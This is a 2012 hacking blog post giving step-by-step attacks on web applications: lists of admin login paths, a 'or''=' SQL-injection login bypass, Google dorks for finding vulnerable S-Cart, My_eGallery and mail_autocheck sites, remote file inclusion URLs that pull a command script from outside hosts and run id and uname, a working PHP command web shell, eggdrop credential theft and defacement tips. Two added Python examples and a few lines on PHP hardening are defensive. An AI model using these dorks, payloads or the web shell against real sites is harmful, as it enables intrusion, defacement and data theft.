
Friday, 15 June 2012

Hacking SQL Injection for admin

SQL Injection for admin

"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
"/admin/adminlogin.asp"
"/admin/adminlogon.asp"
"/admin/admin_login.asp"
"/admin/admin_logon.asp"
"/administrator/admin.asp"
"/administrator/login.asp"
"/administrator/logon.asp"
"root/login.asp"
"admin/index.asp"

Login with:
Community ID: 'or''='
Password: 'or''='

Bugs File: admin page --> /admin
Display: http://target.com/s-cart/admin
1. Search in all search engines, e.g. --> allinurl:s-cart/index.phtml or "s-cart"
2. Get the target site, like --> http://www.target.com/s-cart/index.phtml
3. Now go to the admin page by changing the URL to: http://www.target.com/s-cart/admin --> the browser automatically opens a login and password prompt!!!
login: admin
passwd: 'or''='
4. If you are lucky, you can see the admin manager, show the Order table now, or deface the s-cart page.
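Why 'or''=' gets past the login forms above, and why a parameterized query does not: an added Python/sqlite3 example, not code from the original post. The users table, the admin password and the regex signature are constructed for illustration; the signature is a log-side indicator, not a login filter.

```python
import re
import sqlite3

# The login-bypass string the post types into the admin forms listed above.
PAYLOAD = "'or''='"

# Cheap log-side signature for the 'or''=' family (also matches ' or 'a'='a);
# illustrative only: a real login must be fixed with parameters, not blacklists.
TAUTOLOGY = re.compile(r"'\s*or\s*'[^']*'\s*=\s*'", re.IGNORECASE)


def make_db():
    # Constructed in-memory stand-in for an admin login table; the password
    # is sample data, not taken from any real site.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cret-Admin-Pass')")
    return conn


def build_vulnerable_sql(username, password):
    # The defect behind the bypass: form input pasted straight into the SQL text.
    return ("SELECT username FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(conn, username, password):
    # With password = 'or''=' the WHERE clause reads
    #   username = 'admin' AND password = '' or ''=''
    # and the trailing ''='' is always true, so the query returns a row.
    row = conn.execute(build_vulnerable_sql(username, password)).fetchone()
    return row is not None


def login_parameterized(conn, username, password):
    # The fix: bind the values, so quotes in the input stay data, not syntax.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row is not None


def looks_like_login_bypass(value):
    # Flags a submitted field carrying a quote tautology, for alerting on logs.
    return TAUTOLOGY.search(value) is not None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload:   ", login_vulnerable(db, "admin", PAYLOAD))
    print("parameterized, payload:", login_parameterized(db, "admin", PAYLOAD))
    print("parameterized, real:   ", login_parameterized(db, "admin", "S3cret-Admin-Pass"))
    print("flagged in logs:       ", looks_like_login_bypass(PAYLOAD))
```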
Ok, let's try :P

Securing PHP
How to secure PHP:
1. Open php.ini (find out where it lives on your system).
2. Find the safe_mode setting (default value is off) and turn it to =on.
3. Turn off the dangerous functions like passthru, system, exec by adding their function names to disable_functions=
4. The easy way and more secure --> use plain HTML, not PHP :)
5. Watch out for directory and file permissions. Note: these functions are better off:
   1. passthru, system, exec, myshellexec <-- PHP command shell
   2. fopen <-- can execute a remote file
   3. fwrite, fputs <-- to write files
   4. phpinfo <-- data about PHP

Hacking concept: http://[VICTIM]/mail_autocheck.php?pm_path=http://www.webloe.com/phpinjection.txt?&cmd=id
Web targets you can find in a search engine like Google, for example with the keyword inurl or allinurl: allinurl:/mail_autocheck.php?pm_path=*.*
A sample PHP injection script you can upload to your website follows.
------------------END HERE---------------------------
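Checking a php.ini for the settings that decide whether the pm_path=http://... style of injection above can work at all: an added Python example, not the post's own tooling. It reads the real directives allow_url_fopen, allow_url_include and disable_functions; the two sample php.ini files are constructed, and safe_mode is left out because it was removed in PHP 5.4.

```python
import configparser

# Functions the post says should be turned off via disable_functions.
POST_DANGEROUS_FUNCS = {"passthru", "system", "exec", "phpinfo"}

# Constructed sample php.ini files (not from any real server): the weak
# settings beside a hardened set.  safe_mode is omitted on purpose: it was
# removed in PHP 5.4, so these three directives are what matters today.
WEAK_INI = """
[PHP]
allow_url_fopen = On
allow_url_include = On
disable_functions =
"""

HARDENED_INI = """
[PHP]
allow_url_fopen = Off
allow_url_include = Off
disable_functions = passthru,system,exec,phpinfo,shell_exec
"""


def _is_on(value):
    # php.ini accepts On/1/True/Yes; anything else counts as off.
    return (value or "").strip().strip('"').lower() in ("on", "1", "true", "yes")


def audit_php_ini(text):
    """Return a list of findings; an empty list means every check passed."""
    cp = configparser.ConfigParser(interpolation=None, allow_no_value=True)
    cp.read_string(text)
    php = cp["PHP"]
    findings = []
    # allow_url_include is what lets ?pm_path=http://... or ?basepath=http://...
    # pull a remote script into include(); allow_url_fopen does it for fopen().
    if _is_on(php.get("allow_url_include")):
        findings.append("allow_url_include=On: include()/require() accept remote URLs")
    if _is_on(php.get("allow_url_fopen")):
        findings.append("allow_url_fopen=On: fopen() and friends accept http:// paths")
    raw = php.get("disable_functions") or ""
    disabled = {f.strip() for f in raw.split(",") if f.strip()}
    missing = sorted(POST_DANGEROUS_FUNCS - disabled)
    if missing:
        findings.append("disable_functions is missing: " + ", ".join(missing))
    return findings


if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(name, audit_php_ini(ini) or ["ok"])
```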
######################################
My_eGallery security exploit
Author: scariot shall live for ever
######################################
Bugs File may be: displayCategory.php
Display: http://www.target.com/modules/My_eGallery/public/displayCategory.php
Note: for attacking you must use this script; save it and upload it to your website.
e.g. save with the filename: cmd.txt
e.g. from my site: http://www.geocities.com/seng_due/script/solohackerlink.txt
---------------- script from here -----------------------------------------------------
SCARIOT - WAS HERE !!! TEST YOUR SERVER !!!
Image # saleho PHP :
# Released by : LALIEUR INC
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
<?php
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
scariot shall live for ever
------------------ End of Script ---------------------------------------------------------

###################################
Ok, and now let's search your target
###################################
1. Search in all search engines, e.g. --> "allinurl:displayCategory.php" or "My_eGallery"
2. Get the target site, like --> http://www.target.com/modules/My_eGallery/public/displayCategory.php
3. Test the attack with the code: ?basepath=http://if-istp.net/cmd.txt?&cmd=uname -a;id;
4. Display of the attack: http://www.target.com/modules/My_eGallery/public/displayCategory.php?basepath=http://if-istp.net/cmd.txt?&cmd=uname -a;id;
5. Linux and Unix commands are used here :P e.g.: ls -al, uname -r, cat, echo, etc....

Steal password/user of eggdrop IRC bots
Click here for the Google search: http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=eggdrop+filetype%3Auser+user
Just inject with this, boss, hehehe
User Name: "="
Password: "="

Weird, digiSHOP, why is it still vulnerable? SQL injection is old news too.

Google Inject Again
Keyword: allinurl: uptime3?pin=

ASCII table (Dec / Hex / Code):
Dec Hex Code    Dec Hex Code    Dec Hex Code    Dec Hex Code
  0  00 NUL      32  20 space    64  40 @        96  60 `
  1  01 SOH      33  21 !        65  41 A        97  61 a
  2  02 STX      34  22 "        66  42 B        98  62 b
  3  03 ETX      35  23 #        67  43 C        99  63 c
  4  04 EOT      36  24 $        68  44 D       100  64 d
  5  05 ENQ      37  25 %        69  45 E       101  65 e
  6  06 ACK      38  26 &        70  46 F       102  66 f
  7  07 BEL      39  27 '        71  47 G       103  67 g
  8  08 BS       40  28 (        72  48 H       104  68 h
  9  09 HT       41  29 )        73  49 I       105  69 i
 10  0A LF       42  2A *        74  4A J       106  6A j
 11  0B VT       43  2B +        75  4B K       107  6B k
 12  0C FF       44  2C ,        76  4C L       108  6C l
 13  0D CR       45  2D -        77  4D M       109  6D m
 14  0E SO       46  2E .        78  4E N       110  6E n
 15  0F SI       47  2F /        79  4F O       111  6F o
 16  10 DLE      48  30 0        80  50 P       112  70 p
 17  11 DC1      49  31 1        81  51 Q       113  71 q
 18  12 DC2      50  32 2        82  52 R       114  72 r
 19  13 DC3      51  33 3        83  53 S       115  73 s
 20  14 DC4      52  34 4        84  54 T       116  74 t
 21  15 NAK      53  35 5        85  55 U       117  75 u
 22  16 SYN      54  36 6        86  56 V       118  76 v
 23  17 ETB      55  37 7        87  57 W       119  77 w
 24  18 CAN      56  38 8        88  58 X       120  78 x
 25  19 EM       57  39 9        89  59 Y       121  79 y
 26  1A SUB      58  3A :        90  5A Z       122  7A z
 27  1B ESC      59  3B ;        91  5B [       123  7B {
 28  1C FS       60  3C <        92  5C \       124  7C |
 29  1D GS       61  3D =        93  5D ]       125  7D }
 30  1E RS       62  3E >        94  5E ^       126  7E ~
 31  1F US       63  3F ?        95  5F _       127  7F DEL


That's all I can give you, thanks.
